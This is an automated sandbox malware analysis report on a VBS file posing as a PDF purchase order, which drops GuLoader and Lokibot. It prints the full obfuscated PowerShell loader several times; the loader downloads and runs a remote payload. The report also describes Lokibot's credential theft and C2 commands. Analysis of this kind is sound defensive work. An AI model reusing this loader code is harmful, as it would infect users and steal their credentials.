Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs

Overview

General Information

Sample name:SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:SOLICITUD DE PEDIDO (Universidade de So Paulo (USP))09-30-2024pdf.vbs
Analysis ID:1523156
MD5:8de3bba9fb959d08b3719f1281957c56
SHA1:b8132af0e02ecb58c3c3eb39fe919e3b805106cf
SHA256:c2df6879029285a4edb1e60526812177c3ac1b7293e5b5f05d8250d682641e25
Tags:Lokivbsuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5876 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus 'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. vampWSuperE BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus ' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis ') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor- P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne (Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt ');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5588 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus 'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. vampWSuperE BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus ' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis ') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor- P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne (Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt ');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 2584 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.3056701550.00000000083B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        00000005.00000002.3043556156.0000000005624000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000005.00000002.3057467096.0000000009F62000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_5972.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_5588.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc6eb:$b2: ::FromBase64String(
                • 0xb77c:$s1: -join
                • 0x4f28:$s4: +=
                • 0x4fea:$s4: +=
                • 0x9211:$s4: +=
                • 0xb32e:$s4: +=
                • 0xb618:$s4: +=
                • 0xb75e:$s4: +=
                • 0x15a53:$s4: +=
                • 0x15ad3:$s4: +=
                • 0x15b99:$s4: +=
                • 0x15c19:$s4: +=
                • 0x15def:$s4: +=
                • 0x15e73:$s4: +=
                • 0xbf97:$e4: Get-WmiObject
                • 0xc186:$e4: Get-Process
                • 0xc1de:$e4: Start-Process
                • 0x166bf:$e4: Get-Process

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", ProcessId: 5876, ProcessName: wscript.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49714
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", ProcessId: 5876, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n 